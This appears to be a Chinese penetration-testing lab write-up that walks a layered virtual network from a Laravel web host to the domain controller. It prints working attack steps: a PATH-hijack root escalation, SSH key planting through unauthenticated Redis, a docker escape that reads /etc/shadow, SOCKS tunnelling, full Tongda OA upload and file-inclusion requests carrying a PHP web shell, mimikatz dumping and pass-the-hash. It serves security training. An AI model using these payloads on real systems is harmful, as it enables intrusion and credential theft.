‍

‍

 一、 环境 

DMZ区域：

Ubuntu (Web 1)配置了两个网卡，一个桥接可以对外提供服务；一个连接在VMnet8上连通第二层网络。

第二层网络区域：

Ubuntu (Web 2)和Windows 7 (PC 1)都配置了两个网卡，一个连接在VMnet8上连通第二层网络，一个连接在VMnet14上连通第三层网络。

第三次网络区域：

Windows Server 2012和Windows 7 (PC 2)都只配置了一个网卡，一个连接在VMnet14上连通第三层网络。

 二、 WEB 渗透 

2.1   信息收集

首先获得目标ip为192.168.1.104,对目标进行端口服务扫描

扫描后发现22、80、81、6379端口

访问81发现laravel

2.2   CVE-2021-3129

这里直接用REC上传shell

发现目标网站在容器中

2.3   提权

目前我们在www-data用户下,权限较低,需要先提权

首先需要找到高权限的文件

find / -perm -u=s -type f 2>/dev/null

此处我们发现home目录下存在shell文件,运行发现是ps命令

因为蚁剑是伪终端,所以需要先反弹shell到kali上

尝试更改$PATH来提权

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
export PATH=/tmp:$PATH
cd /home/jobs
./shell

此时我们已经获得root权限

后面本来想做docker逃逸的,但是逃逸一直不成功,所以先换个思路

2.4   redis未授权

我们发现目标机192.168.1.104还开启了6379端口

首先在kali生成密钥

ssh-keygen -t rsa
(echo -e "nn"; cat /root/.ssh/id_rsa.pub; echo -e "nn") > 1.txt   #将公钥信息写入1.txt
cat 1.txt | redis-cli -h 192.168.0.103 -x set xxx

然后使用redis将ssh公钥写入目标主机:

config set dir /root/.ssh    # 设置redis的备份路径为/root/.ssh/
config set dbfilename authorized_keys    # 设置保存文件名为authorized_keys
save    # 将数据保存在目标服务器硬盘上

ssh登陆

上线msf

找到内网192.168.52.0/24网段

2.5   docker逃逸

这里使用特权模式逃逸

首先创建一个目录来挂载文件:

mkdir /th1e

在docker容器里挂载一个宿主的本地目录，这样某些容器里输出的文件，就可以在本地目录中打开访问了

mount /dev/sda1. /th1e

这里计划任务不知道为什么一直执行失败

因为我们现在是root权限,可以直接拿密码去解密

cat /th1e/etc/shadow

还有一种办法,这里试试修改密钥

还是在kali生成ssh-keygen

ssh-keygen -f web

将web和web.pub上传到服务器上

将web.pub写入到宿主机root的.ssh中

在跳板机上远程连接成功

这里把这一台也上线到msf,这里创建一个正向连接

成功上线

 三、 二层网络渗透 

此时我们得到两台主机权限,分别是192.168.1.104和192.168.52.20

先挂上代理

kali:

./ew_for_linux64 -s rcsocks -l 7777 -e 1234

目标机:

./ew_for_linux64 -s rssocks -d 192.168.1.128 -e 1234

此时我们对192.168.52.30进行扫描

这里看到8080跑了nginx,直接网页代理上去看看

3.1   通达OA

首先查看版本号

版本为11.3

3.1.1     任意用户登陆

登陆抓包

指向/logincheck_code.php、删除cookie并在post中添加UID=1

使用PHPSESSID访问/general/

远程登录成功

3.1.2      任意文件上传

任意文件上传漏洞/ispirit/im/upload.php

POST /ispirit/im/upload.php HTTP/1.1
Host: 49.233.3.2:8888
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

上传成功,文件名为2102/130054384.jpg

3.1.3      文件包含

POST /ispirit/interface/gateway.php HTTP/1.1
Host: 49.233.3.2:8888
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 69
Content-Type: application/x-www-form-urlencoded

json={"url":"/general/../../attach/im/2007/422124454.jpg"}&cmd=whoami

命令执行成功

3.2   getshell

使用psh-cmd载荷类型

成功上线msf

3.3   信息收集

发现192.168.93.0网段

加上内网路由

arp扫描93网段存活主机

kiwi抓取密码

 四、 三层网络渗透 

4.1   CS

碰到windows直接发病了!

RNM,CS上线!!!

生成一个web的powershell

上线CS

扫描内网主机端口

先把hash弄下来,run mimikatz

这里直接拿到administrator密码就没什么好说的了,直接hash传递拿域控,然后加个新的监听再用拿下域内主机

CS没什么好说的,到这就算完事了

4.2   MSF

这里再玩玩MSF

发现hash传递失败了,防火墙?

关掉关掉,一定要关掉.....

然后在传递hash

直接拿下

PS:这可能是这个系列最后一篇内容了,顺应公司规划,后续工作重心调整到其他方面,不会再产出域渗透相关内容了...

‍

‍

原文始发于微信公众号（山石网科安全技术研究院）：记一次曲折的域环境渗透测试 IV